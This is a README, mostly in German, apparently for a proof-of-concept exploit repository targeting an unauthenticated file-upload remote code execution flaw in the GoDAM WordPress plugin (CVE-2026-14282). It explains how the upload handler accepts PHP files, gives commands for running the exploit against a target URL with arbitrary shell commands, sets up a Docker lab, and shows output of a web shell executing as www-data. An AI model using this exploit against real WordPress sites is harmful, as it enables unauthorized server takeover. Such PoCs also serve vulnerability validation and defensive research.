
GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282)
Autor: nullwhisper
Verwendungszweck: nur für autorisierte Sicherheitsforschung / Schwachstellenvalidierung.
Die GoDAM-WordPress-Plugin-Versionen <= 1.12.2 registrieren ein WPForms-Feld namens godam_record. Der Upload-Handler save_video_file() ist an die öffentliche Aktion wpforms_process_before_filter gebunden und wird daher vor jeder Authentifizierungsprüfung ausgeführt. Der Handler vertraut dem vom Angreifer kontrollierten Content-Type-Header, akzeptiert eine PHP-Datei, solange der MIME-Typ mit video/ beginnt, und verschiebt sie in das vom Webserver ausgelieferte Verzeichnis wp-content/uploads/godam/wpforms/. Dadurch kann ein nicht authentifizierter Angreifer beliebigen PHP-Code hochladen und ausführen.
.
├── cve_2026_14282_poc.py # Main PoC
├── lab/
│ ├── docker-compose.yml # WordPress lab
│ └── setup.php # Creates a WPForms form with GoDAM field
├── requirements.txt
└── README.md
pip3 install -r requirements.txt
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form
Das Skript erkennt die WPForms-Formular-ID und die GoDAM-Feld-ID automatisch. Wenn die Seite mehrere Formulare enthält oder die Erkennung fehlschlägt, verwende:
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
--form-id 4 --field-id 1 --cmd "whoami"
Lade die verwundbaren Plugins herunter (gib die Binärdateien nicht weiter):
mkdir -p lab/wpforms-lite lab/godam
cd lab/wpforms-lite
wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
unzip wpforms-lite.latest-stable.zip
rm wpforms-lite.latest-stable.zip
cd ../godam
wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
unzip godam.1.12.2.zip
rm godam.1.12.2.zip
cd ../..
Starte das Labor:
cd lab
docker compose up -d
Schließe den WordPress-Installer unter http://127.0.0.1:8092 ab.
Installiere und aktiviere die Plugins und erstelle dann das Formular und die Testseite:
docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
docker exec -i lab-wpcli-1 php /tmp/setup.php
Führe den PoC aus:
python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
Getestet mit WordPress 6.8 + WPForms Lite (aktuellste Version) + GoDAM 1.12.2.
[*] Detecting WPForms form and GoDAM field...
[*] Found form ID 4, GoDAM field(s): 1
[*] Trying upload via field 1...
[+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
[+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Command output:
GODAM-RCE-Linux ... PWNED
Dieses Repository enthält nur den PoC und die Orchestrierungsdateien für das Labor. Die verwundbaren Plugin-Binärdateien sind nicht enthalten, um Bloat und Verteilungsprobleme zu vermeiden. Lade die jeweiligen verwundbaren Versionen für dein eigenes Labor von WordPress.org herunter.
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Verwende es nicht gegen Systeme, die dir nicht gehören oder für die du keine ausdrückliche Erlaubnis zum Testen hast. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diesen Code verursacht werden.